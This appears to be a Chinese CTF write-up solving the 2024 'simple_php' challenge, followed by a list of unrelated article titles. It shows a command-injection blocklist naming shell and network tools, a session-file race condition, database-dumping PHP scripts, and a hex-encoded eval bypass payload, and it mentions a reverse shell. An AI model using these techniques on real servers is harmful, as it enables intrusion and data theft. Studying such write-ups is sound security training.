<?php

ini_set('open_basedir', '/var/www/html/');

error_reporting(0);

if(isset($_POST['cmd'])){

  $cmd = escapeshellcmd($_POST['cmd']);

   if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {

     system($cmd);

}

}

show_source(__FILE__);

?>

题目如上过滤了很多

方法一:

经过测试发现可以利用session文件包含

意思就是你传一个post请求包

他会生成一个临sess_+时文件

文件名即为/sess_+PHPSESSID值

临时文件在/tmp/sess_aaaa下

系统会删除这个文件

我们要在它删除之前去访问它(条件竞争)

直接post传cmd=php /tmp/sess_aaaa

两个文件同时去发包

在构建的post包123处写上想要执行的代码即可

<?php system('ls /');?>

执行后没找到flag

怀疑在数据库中

利用php脚本去链接数据库

<?php

// 建立连接

$conn = new mysqli("localhost", "root", "root");

// 检查连接

if ($conn->connect_error) {

    die("连接失败: " . $conn->connect_error);

}

// 查询所有数据库名

$sql = "SHOW DATABASES";

$result = $conn->query($sql);

// 输出数据库名

if ($result->num_rows > 0) {

    while($row = $result->fetch_assoc()) {

        echo "数据库名:" . $row["Database"] . "<br>";

    }

} else {

    echo "未找到数据库。";

}

// 关闭连接

$conn->close();

?>

成功

并且发现可疑数据库

继续查表

<?php

// 数据库连接信息

$servername = "localhost";

$username = "root";

$password = "root";

$dbname = "PHP_CMS";

// 创建连接

$conn = new mysqli($servername, $username, $password, $dbname);

// 检查连接

if ($conn->connect_error) {

    die("连接失败: " . $conn->connect_error);

}

// 查询所有表名

$sql = "SHOW TABLES";

$result = $conn->query($sql);

// 输出表名

if ($result->num_rows > 0) {

    echo "数据库 " . $dbname . " 中的表名:<br>";

    while($row = $result->fetch_assoc()) {

        echo $row["Tables_in_PHP_CMS"] . "<br>";

    }

} else {

    echo "该数据库中没有表。";

}

// 关闭连接

$conn->close();

?>

发现可疑表F1ag_Se3Re7

接着去查表中内容

<?php

// 数据库连接信息

$servername = "localhost";

$username = "root";

$password = "root";

$dbname = "PHP_CMS";

// 创建连接

$conn = new mysqli($servername, $username, $password, $dbname);

// 检查连接

if ($conn->connect_error) {

    die("连接失败: " . $conn->connect_error);

}

// 查询 F1ag_Se3Re7 表中的内容

$sql = "SELECT * FROM F1ag_Se3Re7";

$result = $conn->query($sql);

// 输出内容

if ($result->num_rows > 0) {

    echo "F1ag_Se3Re7 表中的内容:<br>";

    while($row = $result->fetch_assoc()) {

        // 输出每行数据

        foreach ($row as $key => $value) {

            echo $key . ": " . $value . "<br>";

        }

        echo "<br>";

    }

} else {

    echo "F1ag_Se3Re7 表中没有数据。";

}

// 关闭连接

$conn->close();

?>

得到flag

ctfshow{2c8541c2-ad6e-42a5-93c1-fe2e2fb1243c}

方法二:

和方法一类似

前提是你需要有一个服务器(我的服务器出了些问题就不演示了,有什么难点可以找我讨论)

还是用上面的方法

直接去反弹shell(反弹shell的命令网上有,用php的)

方法三:

这里的环境是比赛时的环境

过滤比较多

但还可以利用php -r

后面用编码绕过

目录中没有flag怀疑在数据库中

接下来连接数据库执行命令

先查库

<?php

$a="echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;'`;";

$b=bin2hex($a);

echo $b;

?>


结果:6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b27603b

查表

再查表中内容

<?php

$a="echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;select * from F1ag_Se3Re7;'`;";

$b=bin2hex($a);

echo $b;

?>

即可

cmd=php -r eval(hex2bin(substr(s6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b73656c656374202a2066726f6d20463161675f5365335265373b27603b,1)));

也可得到flag

国赛2024 simple_php(三种方法)的更多相关文章

  1. Eclipse插件安装的三种方法

    转自:http://www.blogjava.net/tangzurui/archive/2008/06/30/211669.html  整理了一下格式. (前两种安装方式以多国语言包的安装为例) 1 ...

  2. 像画笔一样慢慢画出Path的三种方法(补充第四种)

    今天大家在群里大家非常热闹的讨论像画笔一样慢慢画出Path的这种效果该如何实现. 北京-LGL 博客号@ligl007发起了这个话题.然后各路高手踊跃发表意见.最后雷叔 上海-雷蒙 博客号@雷蒙之星 ...

  3. JAVA之线程同步的三种方法

    最近接触到一个图片加载的项目,其中有声明到的线程池等资源需要在系统中线程共享,所以就去研究了一下线程同步的知识,总结了三种常用的线程同步的方法,特来与大家分享一下.这三种方法分别是:synchroni ...

  4. java解析xml的三种方法

    java解析XML的三种方法 1.SAX事件解析 package com.wzh.sax; import org.xml.sax.Attributes; import org.xml.sax.SAXE ...

  5. 【Android】Eclipse自动编译NDK/JNI的三种方法

    [Android]Eclipse自动编译NDK/JNI的三种方法 SkySeraph Sep. 18th  2014 Email:skyseraph00@163.com 更多精彩请直接访问SkySer ...

  6. DataTable数据批量写入数据库三种方法比较

    DataTable数据批量写入数据库三种方法比较 标签: it 分类: C#1)   insert循环插入:2)   sqldataadapter.update(dataset,tablename); ...

  7. 转载:WinForm中播放声音的三种方法

    转载:WinForm中播放声音的三种方法 金刚 winForm 播放声音 本文是转载的文章.原文出处:http://blog.csdn.net/jijunwu/article/details/4753 ...

  8. [mysql]三种方法为root账户指定密码

    前言:前段时间把mysql安装后一直没管它,当时就在奇怪为什么mysql登陆不要密码,原来一直用的超用户账户登陆的(简称超级用户) 其实只怪自己太无知,之前一直用的phpbydamin进行的数据库的可 ...

  9. 三种方法查看MySQL数据库的版本

    1.使用-V参数 首先我们想到的肯定就是查看版本号的参数命令,参数为-V(大写字母)或者--version 使用方法: D:\xampp\mysql\bin>mysql -V 或者 D:\xam ...

  10. 【SQL】Oracle分页查询的三种方法

    [SQL]Oracle分页查询的三种方法 采用伪列 rownum 查询前10条记录 ? 1 2 3 4 5 6 7 8 9 10 11 [sql] select * from t_user t whe ...

随机推荐

  1. 关于对于Java中Entity以及VO,以及DTO中Request对象序列化的学习

    关于 Serializable的探讨 前提引入 是由于软件测试上有同学提到说,什么该字段在程序刚运行时,导致jvm激增,所以吸引了我的注意 回顾代码 MybatisPlus Generator自动生成 ...

  2. 基于Ubuntu20.04在k8s 1.25部署gin+MySQL服务

    0. 前言 某天突发奇想,既然都学了 docker 了,那干脆,顺便把 kubernetes 也学了,于是开始了我长达一个月的环境搭建.踩坑历程. 最开始,我的想法是,在我的物理机使用 WSL + d ...

  3. 创建Django项目和应用

    1.创建Django项目 django-admin startproject 项目名称 2.创建应用app python manage.py startapp app名称

  4. Qt(python) + 百度语音合成 实现demo

    python实现 安装api sudo pip3 install baidu-aip 安装音频处理模块pydub sudo pip3 install pydub from aip import Aip ...

  5. GK2023游记

    不会有人高考之后二十多天才更博客吧...(写的很烂,单纯想补个坑) 大概就是写一下纯 whk 的高三生活,是不是流水账无所谓,就算当个记录了 高三生活开头就不太平,高三的班主任和高二一样(姑且叫他 田 ...

  6. redis数据持久化篇

    为什么需要持久化 Redis是个基于内存的数据库. 那服务一旦宕机,内存中的数据将全部丢失. 通常的解决方案是从后端数据库恢复这些数据,但后端数据库有性能瓶颈 如果是大数据量的恢复,1.会对数据库带来 ...

  7. 计算机网络实验一:vlan的创建与划分

    这个是 pkt文件 有两道题 所以我是两个文件 https://pan.quark.cn/s/d4170897cb59 https://pan.quark.cn/s/da48878c77f5 发现 复 ...

  8. FreeRTOS简单内核实现5 阻塞延时

    0.思考与回答 0.1.思考一 为什么 FreeRTOS简单内核实现3 任务管理 文章中实现的 RTOS 内核不能看起来并行运行呢? Task1 延时 100ms 之后执行 taskYIELD() 切 ...

  9. PHP 程序员转 Go 语言的经历分享

    大家好,我是码农先森. 之前有朋友让我分享从 PHP 转 Go 的经历,这次它来了.我主要从模仿.进阶.应用这三个方面来描述转 Go 的经历及心得.模仿是良好的开端,进阶是艰难的成长,应用是认知的提升 ...

  10. Linux高级命令

    重定向 重定向也称为输出重定向,用于将命令的输出保存到目标文件. 使用方法:> 文件名 或 >> 文件名.前者会覆盖文件内容,后者会追加内容到文件. 查看文件内容命令 cat: 显示 ...